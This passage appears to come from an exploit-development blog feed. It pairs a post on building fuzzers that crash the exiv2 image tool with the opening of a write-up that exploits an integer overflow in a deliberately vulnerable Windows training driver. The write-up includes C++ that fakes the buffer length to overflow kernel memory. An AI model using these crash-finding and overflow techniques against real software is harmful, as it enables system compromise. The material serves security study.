So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So our C++ implementation needs roughly 33% less time for the same number of iterations. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).
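If you want to double check the arithmetic, here is a quick sketch using the two measured run times from above. The variable names are just for illustration; it also expresses the result as iterations per second, which is another common way to compare fuzzers.

```python
python_seconds = 256.881   # 100,000 iterations, Python fuzzer
cpp_seconds = 172.638      # 100,000 iterations, C++ fuzzer
iterations = 100_000

time_ratio = cpp_seconds / python_seconds   # fraction of the Python runtime
time_saved = 1 - time_ratio                 # reduction in wall-clock time
speedup = python_seconds / cpp_seconds      # throughput multiplier

print(f"C++ takes {time_ratio:.0%} of the Python runtime")
print(f"wall-clock time reduced by {time_saved:.0%}")
print(f"throughput multiplier: {speedup:.2f}x")
print(f"Python: {iterations / python_seconds:.0f} iter/s, "
      f"C++: {iterations / cpp_seconds:.0f} iter/s")
```

Note that "33% less time" and "about 1.5x the throughput" describe the same measurement from two directions.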

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us to explore, but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported, and not a trivial binary for us to find bugs on like our last target (an unsupported 7 year old project on Github).

This target has already been fuzzed by much more advanced fuzzers, you can simply google for something like ‘ASan exiv2’ and get plenty of hits of fuzzers creating segfaults in the binary and forwarding the ASan output to the github repository as a bug. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor its performance over 50,000 iterations. Let’s add some code that monitors for Floating point exceptions in addition to our Segmentation fault detection (Call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    # a negative return code means the child was killed by that signal number
    if p.returncode == -11:
        # signal 11 is SIGSEGV
        with open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") as f:
            f.write(data)
        print("Segfault!")

    elif p.returncode == -8:
        # signal 8 is SIGFPE
        with open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") as f:
            f.write(data)
        print("Floating Point!")
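The -11 and -8 comparisons work because Popen reports a child that was killed by a signal as the negative signal number. Here is a minimal sketch of turning such a return code into a readable name with the standard signal module. The helper name describe_returncode is made up for this example, and the signal numbers assume Linux:

```python
import signal

def describe_returncode(returncode):
    """Return the signal name for a negative Popen return code, else None."""
    if returncode is None or returncode >= 0:
        return None  # still running, or a normal exit
    try:
        return signal.Signals(-returncode).name
    except ValueError:
        # not a signal number this platform knows about
        return "signal {}".format(-returncode)

if __name__ == "__main__":
    for code in (-11, -8, 0, 1):
        print(code, describe_returncode(code))
```

Logging the name instead of hard-coding two numbers would also surface other fatal signals, such as SIGABRT, without extra branches.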

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs, that’s a shame, but could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similar but much improved time:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C and I made some modest improvements on my own. One of the logic changes I made was to collect the data from the original valid image only once and then copy that data into a newly allocated buffer each fuzzing iteration and then do the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds. This was pretty typical in my testing. So just by making a few logic changes and using fewer C++-provided abstractions, we saved a lot of sys time (about 50 seconds here). We increased speed by about 6%.
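The copy-once logic described above can be sketched roughly as follows. This is a Python illustration of the idea, not the C code from the fuzzer; the function names and the number of bit flips are assumptions made for the example:

```python
import random

def load_seed(path):
    """Read the valid image from disk a single time."""
    with open(path, "rb") as f:
        return f.read()

def mutate_copy(seed, flips, rng):
    """Copy the seed into a fresh buffer and flip `flips` random bits in the copy."""
    buf = bytearray(seed)  # new buffer every iteration; the seed is never modified
    for _ in range(flips):
        index = rng.randrange(len(buf))
        buf[index] ^= 1 << rng.randrange(8)
    return buf

if __name__ == "__main__":
    rng = random.Random(1234)
    seed = bytes(range(256)) * 4  # stand-in for the bytes of Canon_40D.jpg
    for iteration in range(3):
        mutated = mutate_copy(seed, flips=8, rng=rng)
        changed = sum(a != b for a, b in zip(seed, mutated))
        print(iteration, "bytes changed:", changed)
```

The point of the design is that the file read happens once, outside the loop, so each iteration only pays for a memory copy and the mutation itself.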

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    // argv[0] is conventionally the program name, the real arguments follow it
    char* argv[5];
    argv[0] = "exiv2";
    argv[1] = "pr";
    argv[2] = "-v";
    argv[3] = "mutated.jpeg";
    argv[4] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
                // child_status is not valid here, so stop waiting
                return;
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}
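For comparison, the same fork / exec / wait flow can be sketched in Python with the os module, which wraps the same system calls. This is only an illustration of the technique under the assumption of a POSIX system. The run_target name and the stand-in child commands are made up for the example:

```python
import os
import signal
import sys

def run_target(argv):
    """Fork, exec argv with output silenced, and report how the child ended.

    Returns ("exited", status) or ("signaled", signal_number).
    """
    pid = os.fork()
    if pid == 0:
        # Child: route stdout and stderr to /dev/null, then replace ourselves.
        try:
            devnull = os.open(os.devnull, os.O_WRONLY)
            os.dup2(devnull, 1)
            os.dup2(devnull, 2)
            os.close(devnull)
            os.execvp(argv[0], argv)  # argv[0] is the program name
        finally:
            os._exit(127)  # only reached if the exec failed
    # Parent: with options=0, waitpid returns once the child has terminated.
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return ("signaled", os.WTERMSIG(status))
    return ("exited", os.WEXITSTATUS(status))

if __name__ == "__main__":
    # Stand-in targets: one child that kills itself with SIGSEGV, one clean exit.
    crash = [sys.executable, "-c",
             "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"]
    kind, value = run_target(crash)
    print(kind, signal.Signals(value).name if kind == "signaled" else value)
    print(run_target([sys.executable, "-c", "pass"]))
```

No shell is involved at any point, which is the property @lcamtuf was pointing at: the only processes created are the fuzzer's child and the target it turns into.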

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)
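The figures above follow directly from the real times reported by time. A small sketch of the arithmetic, with the percentages taken relative to the C++ fuzzer (the helper names are made up for the example):

```python
def parse_real(text):
    """Convert a `time` value such as '10m45.371s' to seconds."""
    minutes, seconds = text.rstrip("s").split("m")
    return int(minutes) * 60 + float(seconds)

def iterations_per_second(iterations, real):
    """Throughput for a run of `iterations` that took `real` wall-clock time."""
    return iterations / parse_real(real)

if __name__ == "__main__":
    runs = [("C++ Fuzzer", "10m45.371s"),
            ("C Fuzzer", "10m7.686s"),
            ("C Fuzzer 2.0", "8m30.371s")]
    baseline = iterations_per_second(200000, runs[0][1])
    for name, real in runs:
        rate = iterations_per_second(200000, real)
        gain = (rate / baseline - 1) * 100
        print("{}: {:.0f} iterations/sec ({:+.0f}%)".format(name, rate, gain))
```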

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

The universal antidebugger, x64 revamped

10 April 2020 at 00:00
A single step for a debugger, a giant leap for the obfuscator. When a debugger hits a breakpoint, it can single-step through the subsequent instructions, halting after each one. To do so, it uses a dedicated flag called the Trap Flag (TF), which resides at bit 8 of the x86 EFLAGS register. If the Trap Flag is enabled, the processor triggers an interrupt after each instruction has been executed.

HEVD Exploits – Windows 7 x86 Integer Overflow

By: h0mbre
20 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

Thanks to @tekwizz123, I used his method of setting up the exploit buffer for the most part as the Windows macros I was using weren’t working (obviously user error.)

Integer Overflow

This was a really interesting bug to me. Generically, the bug is when you have some arithmetic in your code that allows for unintended behavior. The bug in question here involved incrementing a DWORD value that was set to 0xFFFFFFFF, which overflows the integer size and wraps the value around back to 0x00000000. If you add 0x4 to 0xFFFFFFFF, you get 0x100000003. However, this value no longer fits in the 4 bytes (8 hex digits) of a DWORD, so we lose the leading 1 and we’re back down to 0x00000003. Here is a small demo program:

#include <iostream>
#include <Windows.h>

int main() {

	DWORD var1 = 0xFFFFFFFF;
	DWORD var2 = var1 + 0x4;

	std::cout << ">> Variable One is: " << std::hex << var1 << "\n";
	std::cout << ">> Variable Two is: " << std::hex << var2 << "\n";
}

Here is the output:

>> Variable One is: ffffffff
>> Variable Two is: 3

I actually learned about this concept from Gynvael Coldwind’s stream on fuzzing. I also found the bug in my own code for an exploit on a real vulnerability I will hopefully be doing a write-up for soon (when the CVE gets published.) Now that we know how the bug occurs, let’s go find the bug in the driver in IDA and figure out how we can take advantage.

Reversing the Function

With the benefit of the comments I made in IDA, we can kind of see how this works. I’ve annotated where everything is after stepping through in WinDBG.

The first thing we notice here is that ebx gets loaded with the length of our input buffer in DeviceIoControl when we do this operation here: mov ebx, [ebp+Size]. This is kind of obvious, but I hadn’t really given it much thought before. We allocate an input buffer in our code, usually it’s a character or byte array, and then we usually satisfy the DWORD nInBufferSize parameter by doing something like sizeof(input_buffer) or sizeof(input_buffer) - 1 because we actually want it to be accurate. Later, we might actually lie a little bit here.

Now that ebx is the length of our input buffer, we see that it gets +4 added to it and then loaded into eax. If we had an input buffer of 0x7FC, adding 0x4 to it would make it 0x800. A really important thing to note here is that we’ve essentially created a new length variable in eax and kept our old one in ebx intact. In this case, eax would be 0x800 and ebx would still hold 0x7FC.

Next, eax is compared to esi which we can see holds 0x800. If eax is more than 0x800, we can see that we take the red path down to the Invalid UserBuffer Size debug message. We don’t want that. We need to satisfy this jbe condition, meaning eax has to be below or equal to 0x800.

If we satisfy the jbe condition, we branch down to loc_149A5. We put our buffer length from ebx into eax and then we effectively divide it by 4 since we do a bit shift right of 2. We compare this quotient to edi, which was zeroed out previously and has remained unchanged up until now. If the counter in edi is the same as or more than the length/4 quotient, we move to loc_149F1 where we will end up exiting the function soon after. Right now, since our length/4 is more than edi, we’ll jump to mov eax, [ebp+8].

This series of operations is actually the interesting part. eax is given a pointer to our input buffer and we compare the value there with 0BAD0B0B0. If they are the same value, we move towards exiting the function. So, so far we have identified two conditions where we’ll exit the function: if edi is ever equal to or more than the length of our input buffer divided by 4 OR if the 4 byte value located at [ebp+8] is equal to 0BAD0B0B0.

Let’s move on to the final puzzle piece. mov [ebp+edi*4+KernelBuffer], eax is kind of convoluted looking but what it’s doing is placing the 4 byte value in eax into the kernel buffer at index edi * 0x4. Right now, edi is 0, so it’s placing the 4 byte value right at the beginning of the kernel buffer. After this, the dword ptr value at ebp+8 is incremented by 0x4. This is interesting because we already know that ebp+0x8 is where the pointer is to our input buffer. So now that we’ve placed the first four bytes from our input buffer into the kernel buffer, we move now to the next 4 bytes. We see also that edi incremented and we now understand what is taking place.

As long as:

  1. the length of our buffer + 4 is <= 0x800 (the jbe check),
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0,

we will copy 4 bytes of our input buffer into the kernel buffer and then move onto the next 4 bytes in the input buffer to test criteria 2 and 3 again.
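The three criteria can be modelled in a few lines of Python to see how they interact. This is a sketch of the logic as described in this post, not the driver's code. The function name is made up, 32-bit arithmetic is emulated with a mask, and the size check is assumed to pass when length + 4 is below or equal to 0x800, as the jbe suggests:

```python
KERNEL_BUFFER_BYTES = 0x800
TERMINATOR = 0xBAD0B0B0
MASK32 = 0xFFFFFFFF

def simulate_copy(user_buffer, claimed_size):
    """Return how many 4-byte values the modelled loop copies, or None if rejected."""
    # Criterion 1: the addition happens in a 32-bit register, so it can wrap.
    if ((claimed_size + 4) & MASK32) > KERNEL_BUFFER_BYTES:
        return None  # "Invalid UserBuffer Size" path
    limit = claimed_size >> 2  # the untouched length, divided by 4
    count = 0
    while count < limit:  # criterion 2
        chunk = user_buffer[count * 4:count * 4 + 4]
        if len(chunk) < 4:
            break  # the model ran out of bytes; a real read would keep going
        if int.from_bytes(chunk, "little") == TERMINATOR:  # criterion 3
            break
        count += 1  # one more DWORD lands in the kernel buffer
    return count

if __name__ == "__main__":
    honest = simulate_copy(b"A" * 0x750, 0x750)
    lying = simulate_copy(b"A" * 0x82C + TERMINATOR.to_bytes(4, "little"),
                          0xFFFFFFFF)
    print("honest size copies", hex(honest), "DWORDs")
    print("0xFFFFFFFF size copies", hex(lying), "DWORDs,",
          "kernel buffer holds", hex(KERNEL_BUFFER_BYTES // 4))
```

In the model, a claimed size of 0xFFFFFFFF passes the first check because the sum wraps to 0x3, and only the terminator value stops the copy.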

There can’t really be a problem with copying bytes from the user buffer into the kernel buffer unless somehow the copying exceeds the space allocated in the kernel buffer. If that occurs, we’ll begin overwriting adjacent memory with our user buffer. How can we fool this length + 0x4 check?

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 0x750 (1872)
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is <= 0x800 (the jbe check),
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0BAD0B0B0

We should pass the first check since our buffer is indeed small enough. The second check will eventually make us exit the function, since the Counter increments after every 4 byte copy and will eventually catch up to our length divided by 4. We don’t have to worry about the third check as we don’t have this value in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we see our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”
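The breakpoint address, and the counter value to expect when it fires, are simple arithmetic on the buffer address and length. A quick sketch using the values from this session (the helper names are made up for the example):

```python
BUFFER_START = 0x0012f184  # user buffer address seen in WinDBG
BUFFER_LENGTH = 0x750      # bytes we told the driver about
DWORD = 4

def last_dword_address(start, length):
    """Address of the final 4-byte value the copy loop should read."""
    return start + length - DWORD

def counter_at(start, address):
    """Loop counter value while the DWORD at `address` is being read."""
    return (address - start) // DWORD

if __name__ == "__main__":
    target = last_dword_address(BUFFER_START, BUFFER_LENGTH)
    print(hex(target), hex(counter_at(BUFFER_START, target)))
```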

We resume from here, and we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re doing a comparison on the 4 byte value at this address to ecx or bad0b0b0. We won’t hit that criteria but on the next iteration, our counter will be == to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF and watch us sail right through length check and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will pass the length check now for sure, which we saw coming. The other really interesting thing that we took note of previously but can see playing out here is that ebx has been left undisturbed and is at 0xffffffff still. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating. This value is eventually loaded into eax and divided by 4! 0xffffffff divided by 4 is 0x3fffffff, a bound the Counter will likely never reach, so it will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to, and with nothing to stop the copy we obviously BSOD here. We need a way to terminate the copying function. In comes the terminator string of 0BAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0BAD0B0B0, we cease copying and exit the function.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

